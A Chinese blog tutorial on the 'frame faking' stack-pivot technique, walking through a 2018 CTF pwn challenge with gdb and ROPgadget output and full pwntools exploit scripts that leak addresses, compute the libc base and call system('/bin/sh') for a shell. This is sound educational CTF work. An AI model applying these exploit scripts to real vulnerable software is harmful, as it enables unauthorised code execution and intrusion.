花式栈溢出技巧之frame faking

最新推荐文章于 2022-11-06 19:45:00 发布
最新推荐文章于 2022-11-06 19:45:00 发布
阅读量2.6k 收藏 4
点赞数 6
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AcSuccess/article/details/104580019
版权

frame faking

构造一个虚假的栈帧来控制程序的执行流

原理

之前所讲的栈溢出不外乎两种方式:

  • 控制程序EIP
  • 控制程序EBP

其最终都是控制程序的执行流。在frame faking中,我们所利用的技巧辨是同时控制EBP和EIP,这样我们在控制程序执行流的同时,也改变程序栈帧的位置。

函数的入口点和出口点

入口点

push ebp    #将ebp压栈
mov ebp, esp    #将esp的值赋给ebp

出口点

leave
ret # pop eip 弹出栈顶元素作为程序的下一个执行地址

其中leave指令相当于

mov esp,ebp     #将ebp的值赋给esp
pop ebp     #弹出栈顶元素作为ebp的值

所以函数的出口点的两条指令相当于

mov esp,ebp
pop ebp
pop eip
利用条件
  • 溢出字节较少,难以构造较长的rop链
  • 存在一块可写的内存,且知道其地址
payload设置

此种攻击方法的关键在于如何同时控制ebp和eip,那么如何同时控制ebp和eip的值的?

  • 使用ROPgadget查找leave;ret指令所在的地址
  • 覆盖完成bufer后,使用可控制的地址覆盖ebp的值,使用上述leave;ret指令所在地址覆盖ret的值。

假设程序为32位程序,64位同理

  1. 当函数正常返回时,执行leave;ret指令(此处非执行我们覆盖的ret指令)如下图所示:
  2. mov esp,ebp;将ebp的值赋给esp,此时esp和ebp同时指向ebp基址处,也就是我们设置的可控制的fake ebp值处。
  3. pop ebp,弹出栈顶,也就是ebp的基址,这时会将我们设置的虚假的ebp值赋给ebp寄存器,同时esp+4上行
  4. 执行ret指令,ret指令相当于pop eip;此时栈顶为我们使用ROPgadget查找的leave;ret指令的地址。将这个地址弹出,赋给eip寄存器。esp+4上行
  5. 执行eip寄存器中的指令,leave指令;
  6. mov esp,ebp;将ebp的值赋给esp,此时ebp寄存器中保存的值为我们设置的虚假的可控的地址,于是esp指向来了该可控地址
  7. pop ebp;栈顶弹出赋给ebp,相当于该可控地址的第一个4位地址内容弹出,赋给ebp,可以设置4个a来padding,esp+4上行
  8. 执行ret,我们一般将此时esp指向的地址设为目标函数地址,就可执行目标函数了。

下面以一道例题来说明用法

2018安恒杯月赛下载地址

checksec + IDA
[*] '/mnt/hgfs/ubuntu_share/pwn/stack/over.over'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
  • 64位程序
  • 只开启了nx保护
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  while ( sub_400676() )
    ;
  return 0LL;
}
int sub_400676()
{
  char buf; // [rsp+0h] [rbp-50h]

  memset(&buf, 0, 0x50uLL);
  putchar('>');
  read(0, &buf, 0x60uLL);
  return puts(&buf);
}

通过IDA分析可以得出:

  • 只能溢出0x10字节,也就是16个字符,也就是只能覆盖两个地址,无法构造较长的rop链
  • 但read函数并不会给输入字符串末尾补\0,所以当我们输入0x50个字符时,可以将rbp的值打印出来。
leak rbp的值
  • 在这个题中我们可以直接控制sub_400676函数中的buf所在的内存地址。
  • 所以rbp我们需要覆盖为buf所在的首地址
  • 他们在内存中的具体的值我们看不出来,但他们之间的偏移关系是确定的。
  • 我们可以通过leak rbp,再动态调试一下,得出具体的偏移关系

gdb over.over
b *0x4006B9
// 0x4006B9地址为sub_400676函数中call puts函数的地址,如上图所示
r
123123//输入内容
telescope $rsp 20   //查看从rsp开始的20个地址

  • 我们leak出来的rbp的值为红色的长方形中的蓝色框中的值,为0x00007fffffffdd50
  • 而rsp所指向的地址为0x00007fffffffdce0
  • 0x00007fffffffdce0与0x00007fffffffdd50两个地址之间的偏移相差0x70,蓝色椭圆框所示

查找leave;ret的地址:

root@ubuntu:/mnt/hgfs/ubuntu_share/pwn/stack# ROPgadget --binary over.over --only "leave|ret"
Gadgets information
============================================================
0x00000000004006be : leave ; ret
0x0000000000400509 : ret
0x00000000004007d0 : ret 0xfffe

Unique gadgets found: 3
  • 所以rbp设置为原来的rbp-0x70,ret设置为0x00000000004006be
  • 同时我们还需要在buf的一开始没有溢出的地方调用puts函数,以判断版本
  • 在调用puts函数时,需要设置rdi寄存器,这里使用通用gadgets:csu_init,如读者不熟悉,请先阅读这篇文章
代码如下:
from pwn import *
context.log_level = "DEBUG"

sh = process("over.over")

payload = 'a' * 80

sh.recvuntil('>')

sh.send(payload)

rbp_addr =  u64(sh.recv()[80:-2] + '\x00\x00')

print hex(ebp_addr)

pop_rdi = 0x400793

puts_got = 0x601020 

puts_plt = 0x400530 

ret_addr = 0x400676

leave_ret = 0x4006be

payload = 'a'*8 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(ret_addr) + p64(1)*5 + p64(rbp_addr-0x70) + p64(leave_ret)

sh.send(payload)

sh.recvline()

real_addr = u64(sh.recvline()[:-1] + '\x00\x00')

print hex(real_addr)
此时的栈结构

  • 此时执行leave;ret指令,rsp指向rbp的位置处
  • 按照上文原理中所叙述的,经过两次leave;ret
  • rsp指向pop rdi;ret的gadget处

根据泄露出来的puts地址判断libc版本

libc database:url

完成最后一步:获取shell

代码如下:

from pwn import *
context.log_level = "DEBUG"

sh = process("over.over")

payload = 'a' * 80

sh.recvuntil('>')

sh.send(payload)

rbp_addr =  u64(sh.recv()[80:-2] + '\x00\x00')

print hex(ebp_addr)

pop_rdi = 0x400793

puts_got = 0x601020 

puts_plt = 0x400530 

ret_addr = 0x400676

leave_ret = 0x4006be

payload = 'a'*8 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(ret_addr) + p64(1)*5 + p64(rbp_addr-0x70) + p64(leave_ret)

sh.send(payload)

sh.recvline()

real_addr = u64(sh.recvline()[:-1] + '\x00\x00')

print hex(real_addr)

base_addr = real_addr - 0x06f690

system_addr = base_addr + 0x045390

binsh_addr = base_addr + 0x18cd57

payload = 'a'*8 + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr) + p64(ret_addr) + p64(1)*5 + p64(rbp_addr-0x70-0x30) + p64(leave_ret)

sh.send(payload)

sh.interactive()

注意一点,最后的rbp_addr-0x70-0x30的由来:

  • 不是只需要减0x70就可以吗,怎么又减了0x30
  • 因为第一次泄露完puts的地址后,rsp是指向p64(1)*5的第一个1处
  • 返回地址为sub_400676的函数地址
  • 该函数的开头部分进行了压栈操作,压入了一个rbp,此时的栈结构是这样的:
  • 红字部分为6个8字节,48字节,换算为十六进制为0x30
  • 所以rbp的值需要再减去一个0x30才能到aaaaaaaa字符串的地址处
西杭
关注
专栏目录
花式栈溢出技巧----stack pivoting/frame faking
qq_42192672的博客
10-14 1274
学习文献:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/basic_rop/                   https://www.jianshu.com/p/c53627895330 1.stack pivoting 转移堆  以 X-CTF Quals 2016 - b0verfl0w 为例学习 #若可溢出...
花式栈溢出
m0_49959202的博客
10-04 707
文章目录花式栈溢出1.原理1.1 stack pivoting1.2 栈迁移(frame faking)1.2.1 gadget介绍1.2.2 栈(payload)布置1.2.3 步骤分析stage 1:stage 2:stage 3:stage 4:stage 5:stage 6:其他栈迁移方式:1.3 Stack smash1.4 partial overwrite2.例题2.1 stack pivoting2.1.1 习题信息2.1.2 程序分析2.2 栈迁移(frame faking)2.2.1 习
frame faking
playmaker的博客
01-05 309
int __cdecl main(int argc, const char **argv, const char **envp) { char buf; // [rsp+0h] [rbp-40h] setbuf(stdin, 0LL); setbuf(_bss_start, 0LL); setbuf(stderr, 0LL); puts("Input Your Name:"...
Advanced Exploit Techique之--frame faking技术http://ntbgyz.com/articles/200602/851.html
xu的blog
05-15 2016
Advanced Exploit Techique之--frame faking技术http://ntbgyz.com/articles/200602/851.html                                        (PST)---------[ Subject   : Advanced Exploit Techique之--frame faking技术    
frame-faking-介绍-函数调用伪造
fishmai的专栏
05-18 955
0x00 frame-faking 在处理fusion的level02时遇到新的问题,需要了解frame-faking的原理,查阅了一些资料。 The advanced return-into-lib(c) exploits Advanced Exploit Techique之–frame faking技术 ROP轻松谈 首先感谢各位前辈写的文章。 Fr
Faking-Git-Commits:CS 100 作业 #5
06-24
伪造 Git 提交 我参加了使用 github 跟踪和记录成绩的课程。 如果我们可以破解他的评分系统来更改成绩,教授会提供额外的学分。 所以我想出了一种伪造 git 提交的方法。 我的第一个想法涉及社会工程学。...
faking an ArrayBufferView via inline properties是什么意思?
最新发布
07-15
"faking an ArrayBufferView via inline properties" 的意思是通过内联属性来伪造一个ArrayBufferView。 ArrayBufferView 是 JavaScript 中一组与 ArrayBuffer 相关的类型,例如 TypedArray 和 DataView。它们允许...
花式栈溢出技巧之stack pivoting
至臻求学,胸怀云月
02-18 1517
原理 正如它描述的,该技巧就是劫持栈指针指向攻击者所能控制的内存处,然后在相应位置进行ROP。一般来说,我们可能在下述情况使用劫持栈指针。 可以控制栈溢出的字节数较少,难以构造较长的ROP链。 开启了PIE保护,栈地址未知,我们可以将栈劫持到已知的区域。 其他漏洞难以利用,需要进行转换,比如将栈劫持到推空间,从而在堆上写rop及进行堆漏洞利用。 此外,栈指针劫持有以下几个要求: 可以控制程序...
好好说话之IO_FILE利用(1):利用_IO_2_1_stdout泄露libc
hollk’s blog
02-19 5442
前言 这道题是wiki上tcache attack部分的第二道例题,原题在wiki那个题包里,需要自己找一下,忘记在哪了。。。。。其实个人感觉这道题的考点并不是tcache attack,而是在于IO_FILE的利用。因为这道题与以往所见并不太相同,并没有输出函数,也就意味着无法通过往常的方式利用程序自身的输出函数进行泄露内存地址,所以这时候就需要利用IO_FILE的方式进行输出(我也是第一次遇到,肝了好几天)。这篇文章主要分为两个部分,前半部分主要讲解IO_FILE泄露libc的方式,后半部分是HITCO
house of botcake利用模板+爆破stdout泄露地址 glibc2.31
FUCKING12的博客
11-06 197
【代码】house of botcake利用模板+爆破stdout泄露地址。
fastbin关于chunk size检查问题&&花式泄露libc&&极限getshell&&huxiangbei_2019_namesyste
azraelxuemo的博客
04-10 2882
上图就是大家很熟悉的关于fastbin大小的一个检查 首先是里面一层 chunksize 以及外面一层 这是c源码 而对于汇编层面,由于运行的时候知道具体是32位还是64位,所以做了一定的优化 r15就是我们对应的chunk头地址,+8就是size的起始地址 但注意看,我们其实只是取了size的低8位 那么这里就是绕过的关键,网上很多地方其实讲的都不是很多 只要我们找到的size的地方低8位满足如下要求即可 000000yx y满足在2~8之间就好,x随意 同时size高八位也随意 因为可以看到我.
二进制漏洞挖掘之栈溢出-开启PIE
ylcangel的专栏
10-18 3609
二进制漏洞-栈溢出 github地址:https://github.com/ylcangel/exploits/tree/master/stack_overflow 你可以用于学习,但不能用于商用(如出书、以盈利为目的的课程、文章等),转载需标明出处。 测试平台 系统:CentOS release 6.10 (Final)、32位 内核版本:Linux 2.6.32-754.10.1.e...
花式栈溢出技巧----partial overwrite
qq_42192672的博客
10-18 1242
学习资料:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/others/#partial-overwrite                   https://bbs.ichunqiu.com/thread-43627-1-1.html                   https://www.jianshu.com/...
【pwn】orw
weixin_43960998的博客
06-19 1794
本文分为两部分,一部分是2.27及一下的 setcontext + orw,一部分是 2.29 及以上的 setcontext + orw。 利用条件 2.27: 开了沙箱 uaf 等控制 free_hook 一、2.27 libc 2.27及以下的 setcontext: 给各寄存器传参分别由 rdi 来完成,一般的套路是线泄漏 libc 和 heap_base,我们把某一个 chunk 填充为: frame = SigreturnFrame() frame.rsp = libc.sym['__fr
pwn(无system函数下的栈溢出漏洞利用 | 【puts函数】
weixin_43742794的博客
08-09 3419
pwn100及exp 首先用checksec看一下权限的情况 扔进ida64发现是一个栈溢出漏洞,但是并没有system函数和/bin/sh可以使用 这里需要用到一个DynELF类 具体细节可以参见这篇文章 https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=42933&highlight=pwn 核心思路是通过DynELF泄...
花式栈溢出技巧----Stack smash
qq_42192672的博客
10-17 1415
学习文献:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/others/#stack-smash 以前遇见过一次这种情况,但是是不求甚解的完成了,这次慢慢分析一下原理 栈保护和NX字段都开启了,这里科普一下栈保护,我喜欢叫它金丝雀,链接:https://blog.csdn.net/qq_42192672/article...
网鼎杯pwn之GUESS
Peanuts
08-30 1950
做了网鼎杯才发现自己有多菜。。。 拿到题目先ida一波 基本分析 看到了发现了是一个本地加载flag.txt所以有可能可以用stack samsh:详细可以看ctf wiki上的花式栈溢出技巧然后拖入gdb 进行一波checksec             可以发现有了nx栈不可执行这个还好,但是看到了cannary就有点头疼了。。还好有stack smash这个方法可以...
其它栈溢出技巧
听鬼哥说故事
08-29 5969
其它栈溢出技巧
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

西杭

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值